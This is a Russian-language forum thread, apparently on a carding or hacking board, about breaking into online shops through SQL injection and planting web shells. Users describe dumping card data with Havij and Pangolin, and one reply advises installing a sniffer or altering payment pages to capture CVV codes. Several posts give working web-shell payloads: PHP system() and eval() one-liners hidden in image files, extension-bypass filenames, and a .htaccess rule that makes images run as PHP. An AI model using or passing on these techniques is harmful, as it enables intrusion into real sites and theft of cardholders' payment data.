[Видео] Шоп Sql-inject Шелл Дамп

[Vasders]

Да, будет

 

[Guha5277]

Сегодня целый день мучал тот шоп)
И как итог:
Времени потратил дохрена -
Знаний набрался дохрена +
Не достал из шопа нихрена +
И походу дела там не инклуд никакой, а совсем другой оператор)))
В общем доволен.
Статья помогла - просто отлично! Научился заливать шеллы.
Всем спасибо!

 

[sergaj]

Сегодня целый день мучал тот шоп)

Жизнь полна страданий

И как итог:
Времени потратил дохрена -

Тяжело в учение - легко в бою!

Знаний набрался дохрена +

Учение - свет, не учение - тьма.

Не достал из шопа нихрена +

Семь раз отмерь, один - отрежь.

В общем доволен.
Статья помогла - просто отлично! Научился заливать шеллы.
Всем спасибо!

Это самое главное. Не за что

 

[Дмитрий911]

Я один скачать не могоу? "3 Залив шела".
Сайт выдает постоянно вот это;
Sorry, the free service is at full capacity.

Please try later or upgrade to sendspace Max™ to enable guaranteed slots and instant, fast downloads.
sergaj, Перезалей если это так, пожлста

 

[Ihtiander]

такая же фигня, ни под соксом ни под ВПНом не качает т.Т

 

[platon123]

Тоже такая беда перезалейте

 

[sergaj]

господа-товарищи, у меня проблемы с инетом. из-за кривых рук китайцев и фильтра, некоторые скрипты не работают. поэтому напомните в середине следующей недели мне пожалуйста, тогда перезалью на нормальный файлообменик, который так быстро файлы не удаляет.

 

[Дмитрий911]

Блин =( А я так ждал вашего появления =). Хорошо обязательно напомним. Будем ждать.

 

[sergaj]

перезалил. проверяйте.

 

[Ihtiander]

что-то у меня аваст ругается и блокирует архив с видео там где шелл заливают.... пишет типа трояном пропатчен архив.....

 

[platon123]

Подскажите в чем проблема
Открываю в блокноте картинку добавляю в конец <?php system($_GET["cmd"]); ?>
заливаю на саит картинку
но когда пишу site.com/image.jpg?cmd=phpinfo();
нифига нет картинку показывает и все
Что делаю не так ?
Еще вопрос
Сменил расширение у шела на .jpg
залил как им воспользоваться? когда обращаюсь по адресу site.com/shell.jpg ничего непоказывает
Сори нубяра полный пытаюсь разобраться гуглю по теме ну пока ответы ненашол

 

[sergaj]

shell.php.jpg
shell.jpg.php
shell.php%00.jpg
и другие вариации...
вбей в гугле - залив шелла через картинку
способов кучи - что-нить найдешь.

 

[Дмитрий911]

Подскажите плиз. Все шопы раскручиваю с помащью хавидж. Много шопов попадается с номером карты, именем, адресом, а вот свв нет. Где искать свв? И еще вопрос, может кто нить поделится колонками и таблицами для более эфиктивной раскрутки? Заранее спс за ответ!

 

[sergaj]

Подскажите плиз. Все шопы раскручиваю с помащью хавидж. Много шопов попадается с номером карты, именем, адресом, а вот свв нет.

затерты скорее всего. поэтому нужно ставить сниффер.
можешь в личку стукнуть.

Где искать свв? И еще вопрос, может кто нить поделится колонками и таблицами для более эфиктивной раскрутки? Заранее спс за ответ!

сам составляешь такую базу. в самописных двигагах - там могут быть вообще не поддающиеся логике имена тайблов.

еще есть панголин для инъекций и многие другие.

 

[thom crowzz]

which is best dork query , ? inurl: ************************** ?

 

[Дмитрий911]

sergaj, Спасибо за ответ. Прогуглил панголин, не могу найти нормального, можешь скинуть в пм сыль, или, что нибудь подобное. Если не сложно =)

 

[sergaj]

я им не пользуюсь.
Хавидж и руки+голова в основном мои инструменты

 

[RUN]

затерты скорее всего. поэтому нужно ставить сниффер.

Можно этот вопрос подробней освятить??? Думаю интересно будет не только мне.

 

[Johnny_Cox]

Можно этот вопрос подробней освятить??? Думаю интересно будет не только мне.

Переделай страницу оплаты чтобы тебе отправлялось все что нужно

 

[McGrath]

Подскажите в чем проблема
Открываю в блокноте картинку добавляю в конец <?php system($_GET["cmd"]); ?>
заливаю на саит картинку
но когда пишу site.com/image.jpg?cmd=phpinfo();
нифига нет картинку показывает и все
Что делаю не так ?
Еще вопрос
Сменил расширение у шела на .jpg
залил как им воспользоваться? когда обращаюсь по адресу site.com/shell.jpg ничего непоказывает
Сори нубяра полный пытаюсь разобраться гуглю по теме ну пока ответы ненашол

Естесвенно ничего не будет. Ведь по умолчанию .jpg файл как php скрипт не будет интерпретироваться Веб сервером (Apache, nginx).
Следовательно надо сделать что-бы он это интерпретировал. Самый легкий метод, если есть возможность залития файлов, это залитие файла .htaccess с содержанием:

addtype application/x-httpd-php .php .jpg .jpeg .png

Сначала льешь его, потом уже свою картинку (Шелл), и переходишь на него.
И кстате, лучше через WINHEX записывать в середину код:
<?PHP eval($_GET['c']); ?>
Ибо зачастую самописные "чекеры" формата файла, смотрят по заголовку (Черная стрелка) (Объявление файла зависит от его формата)

Красным уже код.

На моем опыте часто такое вканывало, если не срабатывали другие методы.

Извините что апаю старый топик, но больно часто спрашивают.
И совет sergaj (Не в обиду, бредовый, хоть раз пробывал такое делать? Лишь второй вариант имеет свойство срабатывать иногда, остальное бред ИМХО )

shell.php.jpg
shell.jpg.php
shell.php%00.jpg
и другие вариации...
вбей в гугле - залив шелла через картинку
способов кучи - что-нить найдешь.

Спасибо за внимание.